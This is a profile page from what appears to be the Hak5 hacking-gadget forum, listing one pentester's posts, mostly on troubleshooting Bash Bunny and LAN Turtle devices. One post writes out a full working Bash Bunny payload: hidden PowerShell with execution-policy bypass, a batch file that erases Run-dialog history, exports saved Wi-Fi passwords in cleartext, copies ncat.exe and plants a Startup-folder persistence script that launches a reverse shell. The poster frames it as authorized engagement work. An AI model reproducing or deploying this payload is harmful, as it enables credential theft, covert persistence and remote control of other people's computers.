Jump to content


Active Members
  • Content Count

  • Joined

  • Last visited

  • Days Won


About GrineUlf

  • Rank
    Hak5 Fan

Recent Profile Visitors

318 profile views
  1. This saved me so much headache! Awesome and easy to follow, works for Ubuntu 16.04 LTS as well.
  2. Update from my side, switching the attackmode from hid storage to storage hid, and adding the delay worked! Also I changed the load point of the temp folder, which is now in %USERPROFILE%/temp which works amazingly. I tried the Q GUI R, but for some reason that didn't work, so I stayed with the RUN WIN as pointed out in the bash bunny manual. It is true about the command line and vbscripts possibly be disabled on some machines through policies (had that with a few engagements in the past), but that is just a risk that I need to take. But at least it works now ? Thanks all for the input!
  3. Here is the payload code, as you can see the attack mode is set to hid and storage. Yet Windows sees the device for some reason as an Ethernet Device. DUCKY_LANG='dk' LED SETUP ATTACKMODE HID STORAGE GET SWITCH_POSITION #Runs Powershell script which puts a .vbs file in the startup folder and runs it LED ATTACK RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\e.bat')" LED FINISH I'm not sure exactly what the win7-win8-cdc-acm.inf file does, but just for certainty, here are the contents. ; Windows USB CDC ACM Setup File ; Based on INF template which was: ; Copyright (c) 2000 Microsoft Corporation ; Copyright (c) 2007 Microchip Technology Inc. ; likely to be covered by the MLPL as found at: ; <http://msdn.microsoft.com/en-us/cc300389.aspx#MLPL>. ; For use only on Windows operating systems. [Version] Signature="$Windows NT$" Class=Ports ClassGuid={4D36E978-E325-11CE-BFC1-08002BE10318} Provider=%Linux% DriverVer=11/15/2007,5.1.2600.0 [Manufacturer] %Linux%=DeviceList, NTamd64 [DestinationDirs] DefaultDestDir=12 ;------------------------------------------------------------------------------ ; Windows 2000/XP/Vista-32bit Sections ;------------------------------------------------------------------------------ [DriverInstall.nt] include=mdmcpq.inf CopyFiles=DriverCopyFiles.nt AddReg=DriverInstall.nt.AddReg [DriverCopyFiles.nt] usbser.sys,,,0x20 [DriverInstall.nt.AddReg] HKR,,DevLoader,,*ntkern HKR,,NTMPDriver,,USBSER.sys HKR,,EnumPropPages32,,"MsPorts.dll,SerialPortPropPageProvider" [DriverInstall.nt.Services] AddService=usbser, 0x00000002, DriverService.nt [DriverService.nt] DisplayName=%SERVICE% ServiceType=1 StartType=3 ErrorControl=1 ServiceBinary=%12%\USBSER.sys ;------------------------------------------------------------------------------ ; Vista-64bit Sections ;------------------------------------------------------------------------------ [DriverInstall.NTamd64] include=mdmcpq.inf CopyFiles=DriverCopyFiles.NTamd64 AddReg=DriverInstall.NTamd64.AddReg [DriverCopyFiles.NTamd64] USBSER.sys,,,0x20 [DriverInstall.NTamd64.AddReg] HKR,,DevLoader,,*ntkern HKR,,NTMPDriver,,USBSER.sys HKR,,EnumPropPages32,,"MsPorts.dll,SerialPortPropPageProvider" [DriverInstall.NTamd64.Services] AddService=usbser, 0x00000002, DriverService.NTamd64 [DriverService.NTamd64] DisplayName=%SERVICE% ServiceType=1 StartType=3 ErrorControl=1 ServiceBinary=%12%\USBSER.sys ;------------------------------------------------------------------------------ ; Vendor and Product ID Definitions ;------------------------------------------------------------------------------ ; When developing your USB device, the VID and PID used in the PC side ; application program and the firmware on the microcontroller must match. ; Modify the below line to use your VID and PID. Use the format as shown ; below. ; Note: One INF file can be used for multiple devices with different ; VID and PIDs. For each supported device, append ; ",USB\VID_xxxx&PID_yyyy" to the end of the line. ;------------------------------------------------------------------------------ [SourceDisksFiles] [SourceDisksNames] [DeviceList] %DESCRIPTION%=DriverInstall, USB\VID_F000&PID_FF02, USB\VID_F000&PID_FF02&MI_00 [DeviceList.NTamd64] %DESCRIPTION%=DriverInstall, USB\VID_F000&PID_FF02, USB\VID_F000&PID_FF02&MI_00 ;------------------------------------------------------------------------------ ; String Definitions ;------------------------------------------------------------------------------ ;Modify these strings to customize your device ;------------------------------------------------------------------------------ [Strings] Linux = "Linux Developer Community" DESCRIPTION = "Gadget Serial" SERVICE = "USB RS-232 Emulation Driver" And last, but not least, the actual batch file contents: @echo off reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f set files=%~dp0\ set destnc=C:\temp\ set destp=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ set tm=%date:~-4,4%%date:~-10,2%%date:~-7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% set tm=%tm: =% set wifi=%~d0\loot\%COMPUTERNAME%_%tm%\wifi_profiles mkdir %wifi% >>nul netsh wlan export profile key=clear folder=%wifi% robocopy "%files% " "%destnc% " "ncat.exe" robocopy "%files% " "%destp% " "persistence.vbs" C: cd %destp% cmd /c "persistence.vbs" exit Although I doubt the problem actually lies with the payload itself, as sometimes it does work, and sometimes it does not. As in, sometimes it does copy the files, and start the reverse connection, and sometimes it just doesn't. Thanks for the help so far all ?
  4. I use the bash bunny only on one machine for the tests. Simple user rights are the only thing that is required as the files get copied to the %USERPROFILE% directory. Other then that, it is a simple windows 10 machine. I will definitely try the wait on it. Maybe that will solve the problem, as it does seem that sometimes it takes longer for the bash bunny to load then on other times. If the delay is not enough, I will also try the PID/VIDs, as they currently are set to the default. Also I notice that the bash bunny is seen as a Network device, even though I am using HID STORAGE as the attack mode. Could this be a reason for the problem as well? As in perhaps loading the wrong drivers for the desired attack mode?
  5. Hey Guys, I have a reverse shell payload on my bash bunny, that also extracts wifi profiles. It all works, but sometimes it doesn't work. I have updated the firmware to the latest version also, and still the issue happens. Mind you, this is happening at the same test computer that I always use for testing payloads. Everytime I go on an engagement, or a colleague goes on an engagement, I make sure the bash bunny works and the payload is configured correctly. This again I did last Friday, and that is when I noticed the issue. First time I plugged it in, the payload did not run (even though the lights changed color according to the payload script, from setup, to attack, to finish). But no execution of the payload (like installing the persistence file, extracting the wifi profiles). So I ran it again, pull it out and plug it in again. This time all the files were copied and executed. Thinking the first test was just a fluke, I removed the files copied by the payload from the target machine, and tried it again. This time nothing was copied or executed. (All tests did show the proper lights blinking according to the payload script.) Has anyone else had this problem before? Any suggestions on why this happens? Thanks in advance ?
  6. My name is Mike aka GrineUlf Favourite game: No idea, I don't game anymore. But it used to be the Dune series ? Favourite OS: Ubuntu Favourite console: Don't have one Nationality: Dutch Accent: Generic Sex: Male Age: 32 Race: White European Height: 1m86 Status: Online Build: Normal / Athletic Favourite band: Wardruna Favourite book: Dune by Frank Herbert Favourite author: Frank Herbert Favourite movie: Dune Favourite director: ...I dunno, not really a favorite. Favourite TV Show: Stargate SG-1 Favourite actor: Robert deNiro Favourite actress: Amanda Tapping Favourite Pinup: Amanda Tapping Favourite Comedian: George Carlin Other hobbies: Live action roleplay, re-enactment, hiking, leather crafting, blacksmithing Car: None Occupation: Ethical Hacker
  7. Oh boy, do I know how that goes hahaha, I have had those kind of evenings often enough.
  8. Well, took a moment to look around for you, but the Packages.gz doesn't exist in that location (anymore?). Not sure what you exactly try to download, but maybe this link will help: http://archive.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/
  9. @NanoCoder I take it the ifconfig output is from your computer and not the turtle, considering you can't ssh into it. Have you tried: ssh root@ As that is supposed to be the IP of the turtle ?
  10. GrineUlf


    @MikeF can you tell me a bit more on how you are trying to connect? Are you trying to access it through the network (lan cable) or directly through the USB side when plugged into your computer? Also, can you perhaps give a dump of your ip config when you have the turtle plugged in?
  11. Or just SSH into the turtle, get the network information, update the client file on the server and restart the server. The PS reconnects anyway after a minute or two ?
  12. Cybrary.it offers free educations on many topics in the security field. From basic networking principles to coding and pentesting. Awesome site, and it is free ? Also you can get certificates ?
  13. Sounds like an awesome idea, but wouldn't be more like a Bash Turtle in that case? Considering the Bash Bunny can also run duckyscript ?
  14. As said by @wutanglan, there is not enough information available about your situation to help precisely, and probably iptables trickery can help. But if you own the server that you have the VPN connection on you could also use a high range port that doesn't trip for example windows firewall on the target machine, and use their own internet connection to connect directly to your server. However, this might indeed be noisy (depending on what you actually are doing) as well as possibly unencrypted. I personally use a cloud server to do most of my pentest engagements, and works fine ?
  15. Never mind ? I found the solution after browsing a lot on the forum. The solution that worked for me can be found here (in case others are looking for a solution to the same problem):
  • Create New...